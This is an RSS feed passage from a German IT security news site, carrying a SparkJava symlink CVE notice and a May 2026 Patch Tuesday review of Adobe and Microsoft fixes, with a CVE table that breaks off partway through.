<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=migrao+java+para+java%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 07:44:49 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 07:44:49 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=migrao+java+para+java%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=migrao+java+para+java%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[CVE-2026-17459 | perwendel spark up to 2.9.4 SparkJava ExternalResourceHandler.jav staticFiles.externalLocation symlink (Issue 1296 / EUVD-2026-49054)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in perwendel spark up to 2.9.4. This vulnerability affects the function staticFiles.externalLocation of the file src/main/java/spark/resource/ExternalResourceHandler.jav of the component SparkJava. Executing a manipulation can lead to symlink follo...]]></description>
<link>https://tsecurity.de/de/3695626/sicherheitsluecken/cve-2026-17459-perwendel-spark-up-to-294-sparkjava-externalresourcehandlerjav-staticfilesexternallocation-symlink-issue-1296-euvd-2026-49054/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695626/sicherheitsluecken/cve-2026-17459-perwendel-spark-up-to-294-sparkjava-externalresourcehandlerjav-staticfilesexternallocation-symlink-issue-1296-euvd-2026-49054/</guid>
<pubDate>Sun, 26 Jul 2026 14:29:46 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/perwendel:spark">perwendel spark up to 2.9.4</a>. This vulnerability affects the function <code>staticFiles.externalLocation</code> of the file <em>src/main/java/spark/resource/ExternalResourceHandler.jav</em> of the component <em>SparkJava</em>. Executing a manipulation can lead to symlink following.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-17459">CVE-2026-17459</a>. It is possible to launch the attack remotely. Furthermore, an exploit is available.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[The May 2026 Security Update Review]]></title>
<description><![CDATA[I’m currently in Berlin helping set up for Pwn2Own Berlin, but that doesn’t stop Patch Tuesday from coming, and it’s another big one. At least nothing is listed as being in the wild – for now. Take a break from your regularly scheduled activities and let’s take a look at the latest security patch...]]></description>
<link>https://tsecurity.de/de/3694568/hacking/the-may-2026-security-update-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694568/hacking/the-may-2026-security-update-review/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:56 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">I’m currently in Berlin helping set up for Pwn2Own Berlin, but that doesn’t stop Patch Tuesday from coming, and it’s another big one. At least nothing is listed as being in the wild – for now. Take a break from your regularly scheduled activities and let’s take a look at the latest security patches from Adobe and Microsoft. Due to technical difficulties, there will not be a video companion for this month.</p><p class=""><strong>Adobe Patches for May 2026</strong></p><p class="">For May, Adobe released 10 bulletins addressing 52 unique CVEs in Adobe Commerce, After Effects, Adobe Connect, Illustrator, Media Encoder, Premiere Pro, Substance 3D Painter, Substance 3D Sampler, Content Authenticity SDK, and the Adobe Substance 3D Designer. Here’s this month’s overview table:</p>





















  
  




  


  
    


<table>
<colgroup>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
  <col>
</colgroup>
<thead>
  <tr>
    <th>Bulletin ID</th>
    <th>Product</th>
    <th>CVE Count</th>
    <th>Highest Severity</th>
    <th>Highest CVSS</th>
    <th>Exploited</th>
    <th>Deployment Priority</th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/magento/apsb26-49.html" target="_blank">APSB26-49</a></td>
    <td>Adobe Commerce</td>
    <td>15</td>
    <td>Critical</td>
    <td>8.7</td>
    <td>No</td>
    <td>2</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/after_effects/apsb26-48.html" target="_blank">APSB26-48</a></td>
    <td>Adobe After Effects</td>
    <td>4</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/connect/apsb26-50.html" target="_blank">APSB26-50</a></td>
    <td>Adobe Connect</td>
    <td>2</td>
    <td>Critical</td>
    <td>9.6</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/illustrator/apsb26-51.html" target="_blank">APSB26-51</a></td>
    <td>Adobe Illustrator</td>
    <td>4</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/media-encoder/apsb26-47.html" target="_blank">APSB26-47</a></td>
    <td>Adobe Media Encoder</td>
    <td>2</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/premiere_pro/apsb26-46.html" target="_blank">APSB26-46</a></td>
    <td>Adobe Premiere Pro</td>
    <td>3</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/substance3d_painter/apsb26-55.html" target="_blank">APSB26-55</a></td>
    <td>Adobe Substance 3D Painter</td>
    <td>2</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/substance3d-sampler/apsb26-54.html" target="_blank">APSB26-54</a></td>
    <td>Adobe Substance 3D Sampler</td>
    <td>1</td>
    <td>Critical</td>
    <td>7.8</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/content-authenticity-sdk/apsb26-53.html" target="_blank">APSB26-53</a></td>
    <td>Content Authenticity SDK</td>
    <td>14</td>
    <td>Critical</td>
    <td>7.5</td>
    <td>No</td>
    <td>3</td>
  </tr>
  <tr>
    <td><a href="https://helpx.adobe.com/security/products/substance3d_designer/apsb26-52.html" target="_blank">APSB26-52</a></td>
    <td>Adobe Substance 3D Designer</td>
    <td>5</td>
    <td>Important</td>
    <td>6.3</td>
    <td>No</td>
    <td>3</td>
  </tr>
</tbody>
<tfoot>
  <tr>
    <td>TOTAL</td>
    <td>10 bulletins</td>
    <td>52</td>
    <td></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
</tfoot>
</table>



  
  









  <p class="">The obvious priority this month is the patch for Commerce, with its 15 bugs and deployment priority of 2. The Connect fix should also rank up there since both of its CVEs are CVSS 9s. Beyond those, it’s a pretty typical month for Adobe, with most of the bugs either being cross-site scripting (XSS) or open-and-own code executions.</p><p class=""><strong>Microsoft Patches for May 2026</strong></p><p class="">This month, Microsoft released a whopping 138 new CVEs in Windows and Windows components, Office and Office Components, Microsoft Edge (Chromium-based), Azure, .NET and Visual Studio, Copilot Chat, Github Copilot, M365 Copilot, SQL Server, TCP/IP, and the Telnet Client – yes, the Telnet client. Two of these bugs were reported through the TrendAI ZDI program. 30 of these bugs are rated Critical, three are rated as Moderate, one is rated Low, and the rest are rated Important in severity.</p><p class="">This large volume of fixes follows the largest monthly release in Microsoft’s history and reflects the trend across the industry of a high number of submissions. While not all of these bugs were found by AI, it’s likely they had an AI-related component – even if it was just AI writing the submission. I should also point out the Pwn2Own Berlin occurs in just a few days, and it’s typical for vendors to patch as much as they can before the event.</p><p class="">None of the bugs patched by Microsoft this month are listed as publicly known or under active attack at the time of release, so we’ve got that going for us. Let’s take a closer look at some of the more interesting updates for this month, starting with a nasty-looking bug in DNS:</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41096"><strong>CVE-2026-41096</strong></a><strong> - Windows DNS Client Remote Code Execution Vulnerability<br></strong>This patch fixes a heap-based buffer overflow in the DNS Client triggered by a malicious DNS response. No authentication or user interaction needed, and since the DNS Client runs on virtually every Windows machine, the attack surface is enormous. An attacker with a position to influence DNS responses (MitM, rogue server) could achieve unauthenticated RCE across your enterprise.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41089"><strong>CVE-2026-41089</strong></a><strong> - Windows Netlogon Remote Code Execution Vulnerability<br></strong>This update covers another CVSS 9.8 bug, which is a stack-based buffer overflow that lets an unauthenticated remote attacker execute code on a domain controller by sending a specially crafted network request — no credentials, no user interaction required. Yup – that makes it wormable. This is the highest-impact bug that requires immediate patching: a compromised domain controller is a compromised domain.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42898"><strong>CVE-2026-42898</strong></a><strong> - Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability<br></strong>This bug rates a CVSS 9.9(!) and represents a code injection in Dynamics 365. It allows any authenticated user to execute code with a scope change, meaning exploitation can break out and affect resources beyond the vulnerable component itself. Scope changes are pretty rare, so if you’re running Dynamics 365 On-Prem, definitely test and deploy this patch quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40415"><strong>CVE-2026-40415</strong></a><strong> - Windows TCP/IP Remote Code Execution Vulnerability<br></strong>This bug in the TCP/IP stack results from a use-after-free (UAF) and could allow a remote, unauthenticated threat actor to execute code without user interaction. That makes this another wormable bug. However, this one is much less likely to be exploited. The target needs to be under sustained low-memory (memory pressure) conditions, which is pretty rare. Still, no need to tempt fate here. Test and deploy this one quickly.</p><p class="">Here’s the full list of CVEs released by Microsoft for May 2026:</p>





















  
  




  


  
    





<link rel="File-List" href="2026-May-cvrf.fld/filelist.xml">













<table border="0" cellpadding="0" cellspacing="0" width="920">
 <col width="144">
 <col width="256">
 <col width="104" span="5">
 <tr height="47">
  <td width="144" class="xl65" height="47">CVE</td>
  <td width="256" class="xl65">Title</td>
  <td width="104" class="xl66">Severity</td>
  <td width="104" class="xl66">CVSS</td>
  <td width="104" class="xl66">Public</td>
  <td width="104" class="xl66">Exploited</td>
  <td width="104" class="xl66">Type</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35435"><span>CVE-2026-35435</span></a></td>
  <td width="256" class="xl73">Azure AI Foundry
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">8.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35428"><span>CVE-2026-35428</span></a></td>
  <td width="256" class="xl73">Azure Cloud Shell
  Spoofing Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">9.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42826"><span>CVE-2026-42826</span></a></td>
  <td width="256" class="xl73">Azure DevOps
  Information Disclosure Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">10</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32207"><span>CVE-2026-32207</span></a></td>
  <td width="256" class="xl73">Azure Machine Learning
  Notebook Spoofing Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33109"><span>CVE-2026-33109</span></a></td>
  <td width="256" class="xl73">Azure Managed Instance
  for Apache Cassandra Remote Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">9.9</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33844"><span>CVE-2026-33844</span></a></td>
  <td width="256" class="xl73">Azure Managed Instance
  for Apache Cassandra Remote Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">9</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41105"><span>CVE-2026-41105</span></a></td>
  <td width="256" class="xl73">Azure Monitor Action
  Group Notification System Elevation of Privilege Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33111"><span>CVE-2026-33111</span></a></td>
  <td width="256" class="xl73">Copilot Chat
  (Microsoft Edge) Information Disclosure Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26129"><span>CVE-2026-26129</span></a></td>
  <td width="256" class="xl73">M365 Copilot
  Information Disclosure Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26164"><span>CVE-2026-26164</span></a></td>
  <td width="256" class="xl73">M365 Copilot
  Information Disclosure Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33821"><span>CVE-2026-33821</span></a></td>
  <td width="256" class="xl73">Microsoft Dynamics 365
  Customer Insights Elevation of Privilege Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">7.7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42898"><span>CVE-2026-42898</span></a></td>
  <td width="256" class="xl73">Microsoft Dynamics 365
  On-Premises Remote Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">9.9</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40379"><span>CVE-2026-40379</span></a></td>
  <td width="256" class="xl73">Microsoft Enterprise
  Security Token Service (ESTS) Spoofing Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">9.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40363"><span>CVE-2026-40363</span></a></td>
  <td width="256" class="xl73">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">8.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40358"><span>CVE-2026-40358</span></a></td>
  <td width="256" class="xl73">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">8.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34327"><span>CVE-2026-34327</span></a></td>
  <td width="256" class="xl73">Microsoft Partner
  Center Spoofing Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">8.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40365"><span>CVE-2026-40365</span></a></td>
  <td width="256" class="xl73">Microsoft SharePoint
  Server Remote Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="72">
  <td class="xl67" height="72"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41103"><span>CVE-2026-41103</span></a></td>
  <td width="256" class="xl73">Microsoft SSO Plugin
  for Jira &amp; Confluence Elevation of Privilege Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">9.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl67" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33823"><span>CVE-2026-33823</span></a></td>
  <td width="256" class="xl73">Microsoft Team Events
  Portal Information Disclosure Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">9.6</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40364"><span>CVE-2026-40364</span></a></td>
  <td width="256" class="xl73">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">8.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40366"><span>CVE-2026-40366</span></a></td>
  <td width="256" class="xl73">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">8.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40361"><span>CVE-2026-40361</span></a></td>
  <td width="256" class="xl73">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">8.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40367"><span>CVE-2026-40367</span></a></td>
  <td width="256" class="xl73">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">8.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42831"><span>CVE-2026-42831</span></a></td>
  <td width="256" class="xl73">Office for Android
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41096"><span>CVE-2026-41096</span></a></td>
  <td width="256" class="xl73">Windows DNS Client
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35421"><span>CVE-2026-35421</span></a></td>
  <td width="256" class="xl73">Windows GDI Remote
  Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="71">
  <td class="xl67" height="71"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40403"><span>CVE-2026-40403</span></a></td>
  <td width="256" class="xl73">Windows Graphics
  Component Remote Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40402"><span>CVE-2026-40402</span></a></td>
  <td width="256" class="xl73">Windows Hyper-V
  Elevation of Privilege Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">9.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32161"><span>CVE-2026-32161</span></a></td>
  <td width="256" class="xl73">Windows Native WiFi
  Miniport Driver Remote Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41089"><span>CVE-2026-41089</span></a></td>
  <td width="256" class="xl73">Windows Netlogon
  Remote Code Execution Vulnerability</td>
  <td class="xl68">Critical</td>
  <td class="xl69">9.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32175"><span>CVE-2026-32175</span></a></td>
  <td width="256" class="xl73">.NET Core Tampering
  Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">4.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Tampering</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32177"><span>CVE-2026-32177</span></a></td>
  <td width="256" class="xl73">.NET Elevation of
  Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35433"><span>CVE-2026-35433</span></a></td>
  <td width="256" class="xl73">.NET Elevation of
  Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54518"><span>CVE-2025-54518 *</span></a></td>
  <td width="256" class="xl73">AMD: CVE-2025-54518
  CPU OP Cache Corruption</td>
  <td class="xl70">Important</td>
  <td class="xl69"></td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42899"><span>CVE-2026-42899</span></a></td>
  <td width="256" class="xl73">ASP.NET Core Denial of
  Service Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40381"><span>CVE-2026-40381</span></a></td>
  <td width="256" class="xl73">Azure Connected
  Machine Agent Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42823"><span>CVE-2026-42823 †</span></a></td>
  <td width="256" class="xl73">Azure Logic Apps
  Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">9.9</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33833"><span>CVE-2026-33833</span></a></td>
  <td width="256" class="xl73">Azure Machine Learning
  Notebook Spoofing Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">8.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32204"><span>CVE-2026-32204</span></a></td>
  <td width="256" class="xl73">Azure Monitor Agent
  Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42830"><span>CVE-2026-42830</span></a></td>
  <td width="256" class="xl73">Azure Monitor Agent
  Metrics Extension Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33117"><span>CVE-2026-33117</span></a></td>
  <td width="256" class="xl73">Azure SDK for Java
  Security Feature Bypass Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">9.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41109"><span>CVE-2026-41109</span></a></td>
  <td width="256" class="xl73">GitHub Copilot and
  Visual Studio Code Security Feature Bypass Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">8.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35424"><span>CVE-2026-35424</span></a></td>
  <td width="256" class="xl73">Internet Key Exchange
  (IKE) Protocol Denial of Service Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41614"><span>CVE-2026-41614</span></a></td>
  <td width="256" class="xl73">M365 Copilot for
  Desktop Spoofing Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">6.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41100"><span>CVE-2026-41100</span></a></td>
  <td width="256" class="xl73">Microsoft 365 Copilot
  for Android Spoofing Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">4.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="69">
